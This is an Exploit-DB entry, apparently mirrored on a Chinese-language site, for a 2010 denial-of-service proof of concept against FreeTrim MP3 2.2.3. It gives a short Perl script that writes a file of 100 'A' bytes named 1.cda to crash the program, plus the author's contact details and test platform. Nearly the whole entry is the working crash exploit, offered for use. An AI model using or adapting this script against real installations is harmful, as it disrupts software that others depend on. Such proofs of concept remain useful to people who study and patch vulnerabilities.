FreeTrim MP3 2.2.3 – Denial of Service

  • 作者: h1ch4m
    日期: 2010-12-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15657/
  • ####Exploit Title: FreeTrim MP3Local Crash PoC
    ####Software Link: http://www.freetrimmp3.com/downloads/FreeTrimMP3.exe
    ####Tested on: Win XP SP3
    ####Date: 02-12-2010
    ####Author:h1ch4m
    ####Email: h1ch4m@live.fr
    
    ################################################
    ############# sahra dyalna o jazayrya khotna 
    ################################################
    
    my $file= "1.cda";
    my $junk = "\x41" x 100;
    open($FILE,">$file");
    print $FILE $junk;
    close($FILE);
    print "File Created successfully\n";
    sleep(1);